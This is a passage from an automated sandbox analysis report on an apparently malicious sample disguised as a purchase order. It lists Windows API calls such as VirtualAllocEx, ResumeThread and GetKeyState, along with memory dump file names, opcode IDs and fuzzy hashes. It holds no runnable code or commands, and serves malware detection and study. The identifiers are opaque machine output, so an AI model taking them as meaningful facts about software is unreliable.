                                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0702311A,?,?,?,?,?), ref: 070231BF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                              • Opcode ID: e93ea4ec0f78accafe1a345f099650f5895c9af42a6b39d35fd2439dd68e3f6b
                                                                                                                                              • Instruction ID: 5cecea221d2854d59b6d9c0c1d42e9c69173668e58a3fa5ac1a8da58e95dd06a
                                                                                                                                              • Opcode Fuzzy Hash: e93ea4ec0f78accafe1a345f099650f5895c9af42a6b39d35fd2439dd68e3f6b
                                                                                                                                              • Instruction Fuzzy Hash: EE1137B29002599FDB10DF9AC844BDEFFF8EB48320F14841AE954A7210C379A954DFA5
                                                                                                                                              APIs
                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0751314A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: TextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                              • Opcode ID: 890e7fcc573e1820fdcbf637c474c20cf3b6adb02b2817f81bc534771bc49349
                                                                                                                                              • Instruction ID: cc50c88b24aa88de485e62cc4cdc686fed270c5f02411c447c7530e61b8ba0fb
                                                                                                                                              • Opcode Fuzzy Hash: 890e7fcc573e1820fdcbf637c474c20cf3b6adb02b2817f81bc534771bc49349
                                                                                                                                              • Instruction Fuzzy Hash: 021123B69002099FDB10CF9AC844BDEFBF4FB88320F11C42AE858A7240D378A545CFA5
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0710C9BE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: ea7d09ede94ebbfb2c686dfaa8f36b508ec94ac88010ce72c1b4a96e30f42ca2
                                                                                                                                              • Instruction ID: da49c40304564cafa533fd9cf2799391df72146034b584b9905c099827656369
                                                                                                                                              • Opcode Fuzzy Hash: ea7d09ede94ebbfb2c686dfaa8f36b508ec94ac88010ce72c1b4a96e30f42ca2
                                                                                                                                              • Instruction Fuzzy Hash: E51126B29002499FCB10DFAAC844ADEBBF5EB88324F108819E559A7250C775A544CFA4
                                                                                                                                              APIs
                                                                                                                                              • PeekMessageW.USER32(?,?,?,?,?), ref: 0C466470
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePeek
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2222842502-0
                                                                                                                                              • Opcode ID: cf11e00b314a576c6a1ae08c1aeab76d0eeee752fbedb180ce437b78afd2ce6b
                                                                                                                                              • Instruction ID: 4f959550c05a7e8669113bde4d93fa8fd094639d6e4f387fb804ec1756bde72c
                                                                                                                                              • Opcode Fuzzy Hash: cf11e00b314a576c6a1ae08c1aeab76d0eeee752fbedb180ce437b78afd2ce6b
                                                                                                                                              • Instruction Fuzzy Hash: 3A11F3B6900249DFDB10CF9AD584BDEFBF4FB48320F10842AE558A7650C378A644CFA5
                                                                                                                                              APIs
                                                                                                                                              • PeekMessageW.USER32(?,?,?,?,?), ref: 0C466470
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePeek
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2222842502-0
                                                                                                                                              • Opcode ID: 57aeba728d5824408563353571b1b5c63029493e904dedc83e11497a4fd86fce
                                                                                                                                              • Instruction ID: 1147604f3b72c27e1e931d8c78e48772a000f044f2d1e3569a926133869c2dfd
                                                                                                                                              • Opcode Fuzzy Hash: 57aeba728d5824408563353571b1b5c63029493e904dedc83e11497a4fd86fce
                                                                                                                                              • Instruction Fuzzy Hash: E011F3B58002499FDB10CF9AD944BDEFBF8FB48320F10842AE958A7650C378A544CFA5
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0C46680D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: 66a3139cc9d7739d595e735a2e4efe41a69596702e2f1394a418f22615f6e828
                                                                                                                                              • Instruction ID: b2342d9e47d10316f2bf26199e18aad6395892725e86e59027cf7495dc5a6cde
                                                                                                                                              • Opcode Fuzzy Hash: 66a3139cc9d7739d595e735a2e4efe41a69596702e2f1394a418f22615f6e828
                                                                                                                                              • Instruction Fuzzy Hash: 4611E4B59002498FDB10CFAAD444BDEFBF4BB48320F11842AE554A7650C378A544CFA5
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0C46680D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: 6efb262445bcf0fe077e4bb3503bc5c05c4efb41dd011bbce96fb873586a511d
                                                                                                                                              • Instruction ID: 9b8c9d4f370a948f26e3907411cf720fbf2677b9c483049826b1b7d0ebda906b
                                                                                                                                              • Opcode Fuzzy Hash: 6efb262445bcf0fe077e4bb3503bc5c05c4efb41dd011bbce96fb873586a511d
                                                                                                                                              • Instruction Fuzzy Hash: 5A11C3B59002499FDB10DF9AD844BDEFBF8FB48320F11842AE958A7650C378A944CFA5
                                                                                                                                              APIs
                                                                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 02B61F95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LongWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                              • Opcode ID: 5ee90cc4f63443b07440524548759a27ad84b713e206f26b1ae46a81219a3d0c
                                                                                                                                              • Instruction ID: f4dd056544859f32c5235c6e68d338a3be1d6b7861c2ed78eea5703045b8a8b9
                                                                                                                                              • Opcode Fuzzy Hash: 5ee90cc4f63443b07440524548759a27ad84b713e206f26b1ae46a81219a3d0c
                                                                                                                                              • Instruction Fuzzy Hash: 171116B58002489FCB10CFA9C589BEEBFF4EB49324F24855AD959A7301C379A945CFA4
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: 4893e61a6755c99b96797cb53413e3da84fb9142af9593304cd4013723a1083d
                                                                                                                                              • Instruction ID: 94a0c1f7628eab005857c1ae941304623b6ba162a127833bda3be013eb9a634d
                                                                                                                                              • Opcode Fuzzy Hash: 4893e61a6755c99b96797cb53413e3da84fb9142af9593304cd4013723a1083d
                                                                                                                                              • Instruction Fuzzy Hash: 17113AB19002498FCB10DFAAC4457DFFBF5EB88324F208419D459A7250CB75A544CFA4
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0C46127D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                              • Opcode ID: dda72adae40937236096c16423c8e70579c812816e93b11dfb8810b37e8f7db0
                                                                                                                                              • Instruction ID: db427d2d231b97291b0d549f1f1065f58cc8551384b8a1aea33e0cc9aaf5821d
                                                                                                                                              • Opcode Fuzzy Hash: dda72adae40937236096c16423c8e70579c812816e93b11dfb8810b37e8f7db0
                                                                                                                                              • Instruction Fuzzy Hash: 5D11E3B58003499FDB10CF9AC845BEEFBF8EB48320F10841AE558A7650D379A584CFA5
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00F9B126
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              • Opcode ID: ac952ea24af6ee9ad31cea8a5edae6494627f5c7a871eee9b7601fb51532aa33
                                                                                                                                              • Instruction ID: 63e10648b135f672c9f048cd33a28e29ea6cd01ce620143d09f503ce0f637f49
                                                                                                                                              • Opcode Fuzzy Hash: ac952ea24af6ee9ad31cea8a5edae6494627f5c7a871eee9b7601fb51532aa33
                                                                                                                                              • Instruction Fuzzy Hash: 4C11E0B5C003498FDB10DF9AD944ADEFBF4AF89324F10842AD459B7210D375A585CFA5
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0751DB75
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                              • Opcode ID: 63e17aae9984391f983222ff33ff41b5d00e2a033b9243ab8493fa223c8f21f8
                                                                                                                                              • Instruction ID: b733d1dd920fc3b17ab6fd063b8c20fadac03d6ed42f3b978b491e46779de82f
                                                                                                                                              • Opcode Fuzzy Hash: 63e17aae9984391f983222ff33ff41b5d00e2a033b9243ab8493fa223c8f21f8
                                                                                                                                              • Instruction Fuzzy Hash: 4111FEB99003499FDB10CF99D484BDEBBF4FB48320F10885AD559A7250C375AA84CFA5
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0751DB75
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                              • Opcode ID: e37d5c50e698d2e03a109ceb563cf1e7b52a3ff9089c21de10e99e892f7f81dc
                                                                                                                                              • Instruction ID: 9c391fb7b9ebebd3ec30e6832b39cef260a29cd5ec507bd6dd10ef10d6da51d2
                                                                                                                                              • Opcode Fuzzy Hash: e37d5c50e698d2e03a109ceb563cf1e7b52a3ff9089c21de10e99e892f7f81dc
                                                                                                                                              • Instruction Fuzzy Hash: 1B11D0B59003499FDB10DF9AC885BDEFBF8FB48324F10841AE559A7250C375A984CFA5
                                                                                                                                              APIs
                                                                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 02B61F95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LongWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                              • Opcode ID: 5bf1cb129dac9118a45c3c05b27d594f32fc74aae7bf1b6a7f85a7e724163a92
                                                                                                                                              • Instruction ID: 20e3738a89be56f838202671386d988813992a8cf26975c51263304f0141e211
                                                                                                                                              • Opcode Fuzzy Hash: 5bf1cb129dac9118a45c3c05b27d594f32fc74aae7bf1b6a7f85a7e724163a92
                                                                                                                                              • Instruction Fuzzy Hash: C71103B5800248CFDB10DF9AC588BDEFBF8EB48324F10845AE958A7300C379A944CFA5
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                              • Opcode ID: 65e3774713cbb491734a4ecf578d4f413f3e6f6d71e61f713ec1d51c1b4cc594
                                                                                                                                              • Instruction ID: 64fea209f26420fa11e846c5379c4f66aa80c81537e4562b78a31b8d19d0a370
                                                                                                                                              • Opcode Fuzzy Hash: 65e3774713cbb491734a4ecf578d4f413f3e6f6d71e61f713ec1d51c1b4cc594
                                                                                                                                              • Instruction Fuzzy Hash: 07110DB1C006498FCB10DF9AD444BCEFBF4FB48324F10842AE868A7210C378A544CFA6
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                              • Opcode ID: 144a7337bb8b9847310bb286f8f391f260080f7a223f25d45ae06bc7358dc14e
                                                                                                                                              • Instruction ID: d5e941e1d6a4f8a267c533a876dc51b50e52516e3fd0b8359780f2673d178e09
                                                                                                                                              • Opcode Fuzzy Hash: 144a7337bb8b9847310bb286f8f391f260080f7a223f25d45ae06bc7358dc14e
                                                                                                                                              • Instruction Fuzzy Hash: F21100B5D00649CFDB10CF9AD544BCEFBF4BB48324F10842AD468A7210D378A644CFA6
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07022422
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: 76d2e49f81f9ae6f0eb6f46c83a14c850842936696df7e830e188a71b9a3d229
                                                                                                                                              • Instruction ID: 9764cac4b159f18024694901ba3338a1b173228557e0e3f21fd0d1a8e7f7f934
                                                                                                                                              • Opcode Fuzzy Hash: 76d2e49f81f9ae6f0eb6f46c83a14c850842936696df7e830e188a71b9a3d229
                                                                                                                                              • Instruction Fuzzy Hash: BAE0D8F27506205FCB249E7894589BB3FBDDF84A6070602AAA445C7395DD61CC03CB50
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07022422
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: d60969c25acc216d36da8568573ce40202e947cf43132498a3583b213de2d95b
                                                                                                                                              • Instruction ID: 63c94a65423d7d7b5973c1b64ec361473ae5cf3134fae5070371191b08b8a79d
                                                                                                                                              • Opcode Fuzzy Hash: d60969c25acc216d36da8568573ce40202e947cf43132498a3583b213de2d95b
                                                                                                                                              • Instruction Fuzzy Hash: D2E026B23603245B8A28AB79880883B76ADEF85F1034046AAE506CB350CD60EC028798
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776625651.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_efd000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e62a3d168dcc56fac58c708b7a806dde14f4d9184a3bfd26b5087ed98d100d1e
                                                                                                                                              • Instruction ID: 966dbe1ec4a158a2d44f35a095705c520b10b6405b0a30838fc6fe555e3fb1f5
                                                                                                                                              • Opcode Fuzzy Hash: e62a3d168dcc56fac58c708b7a806dde14f4d9184a3bfd26b5087ed98d100d1e
                                                                                                                                              • Instruction Fuzzy Hash: 6D212571508248DFCB05DF14DDC0B3ABF66FB98318F20C569EA095B256C336D856DAA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776657271.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f0d000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb77d9e8bf799c889e3a56172d31bb781724fa07c8a1d299aafc6334e9343bf1
                                                                                                                                              • Instruction ID: 7eb8f9a5fc6ec17b7ee9e4db3792ed2e6429f3c98be67d6494cf99e70cce43bb
                                                                                                                                              • Opcode Fuzzy Hash: eb77d9e8bf799c889e3a56172d31bb781724fa07c8a1d299aafc6334e9343bf1
                                                                                                                                              • Instruction Fuzzy Hash: 4F212671904304EFDB05DF94D9C0B26FBA5FB84324F20C66DE8094B2D6C336D846EA61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776657271.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f0d000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9d12ec2949d54f962e654e35b61107ec3537549063633cbab83fc12e9a0b0ea8
                                                                                                                                              • Instruction ID: f1e31ac3beaea8961488b4b34d9d73ec3687140c7bdd41c3715c590cc93b1642
                                                                                                                                              • Opcode Fuzzy Hash: 9d12ec2949d54f962e654e35b61107ec3537549063633cbab83fc12e9a0b0ea8
                                                                                                                                              • Instruction Fuzzy Hash: 5F21F271604200DFDB14DF54D984B26BBA5EB84324F20C569D84E4B29AC33AD847EA62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776657271.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f0d000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eedf4541bfeeab1372c496e3e4d895a4b2e2b8cdc7333e3b22dafe5878324915
                                                                                                                                              • Instruction ID: 6377789f0b8a7a8539b315b6ed8041a93d305d96d2a23cfc59ebb893dba4b59b
                                                                                                                                              • Opcode Fuzzy Hash: eedf4541bfeeab1372c496e3e4d895a4b2e2b8cdc7333e3b22dafe5878324915
                                                                                                                                              • Instruction Fuzzy Hash: D0218E755093808FCB02CF24D994715BF71EB46324F28C5EAD8498F6A7C33A980ADB62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776625651.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_efd000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                              • Instruction ID: f5090ce0ba40ceb4b278c6bb86c076162e21d490d98836dee983ef3f83a7c50c
                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                              • Instruction Fuzzy Hash: 6F110372404284CFCB02CF10D9C4B26BF72FB94328F24C6A9D9090B256C336D85ACBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776657271.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f0d000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                              • Instruction ID: 2ada62e0e48008d1d4d8401518d589db13f2cfba2749ecea2603c64e5992a34a
                                                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                              • Instruction Fuzzy Hash: 9611BB75904280DFCB16CF54C9C4B15FBA1FB84324F24C6AAD8494B696C33AD80AEB61
                                                                                                                                              APIs
                                                                                                                                              • GetKeyState.USER32(00000001), ref: 0B88327D
                                                                                                                                              • GetKeyState.USER32(00000002), ref: 0B8832C2
                                                                                                                                              • GetKeyState.USER32(00000004), ref: 0B883307
                                                                                                                                              • GetKeyState.USER32(00000005), ref: 0B88334C
                                                                                                                                              • GetKeyState.USER32(00000006), ref: 0B883391
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: State
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1649606143-0
                                                                                                                                              • Opcode ID: d85534699fd8e3450e5c8a1a780147de6f381a4c5e2703ea37f7fac5a0ad38c5
                                                                                                                                              • Instruction ID: 78603f424591d6c4374f31b8bfc7b190a455201e048e823ba0a80e634522231c
                                                                                                                                              • Opcode Fuzzy Hash: d85534699fd8e3450e5c8a1a780147de6f381a4c5e2703ea37f7fac5a0ad38c5
                                                                                                                                              • Instruction Fuzzy Hash: 81416A71D017468FDB11EF99D5083AFBFF4AB08709F208459E189BB290CBB99145CFA6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: fff?
                                                                                                                                              • API String ID: 0-4136771917
                                                                                                                                              • Opcode ID: 5dddd4b007c257e9bd9ec140bc92f7e84a67ee4d3ac8029384f9922e5b88fb30
                                                                                                                                              • Instruction ID: 6a6d86db64ba7f8787bbd3171ae8cb59cdcf0653d4168e00254e5c6201ad794a
                                                                                                                                              • Opcode Fuzzy Hash: 5dddd4b007c257e9bd9ec140bc92f7e84a67ee4d3ac8029384f9922e5b88fb30
                                                                                                                                              • Instruction Fuzzy Hash: BE425B3690061ADFCF11DF90C884AD9B7B2FF99300F1586D5E9086B265E771AAD9CF80
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: fff?
                                                                                                                                              • API String ID: 0-4136771917
                                                                                                                                              • Opcode ID: d91d3b66dd0e3e5455a4fe9110b976fc5a095a213fd78ab45786ab6d3bcfc011
                                                                                                                                              • Instruction ID: 9e857a72251acc5a20f29c433eef0090f7956b7bec937eac3c11a50c613b7741
                                                                                                                                              • Opcode Fuzzy Hash: d91d3b66dd0e3e5455a4fe9110b976fc5a095a213fd78ab45786ab6d3bcfc011
                                                                                                                                              • Instruction Fuzzy Hash: 8422383690061ADFDF11DF50C888BD9B7B2FF49300F0585D5E9096B16AD771AA9ACF80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 76fb3b8cac70008146dad764b8dfbfc8b808d2f244a071a50930847b12544891
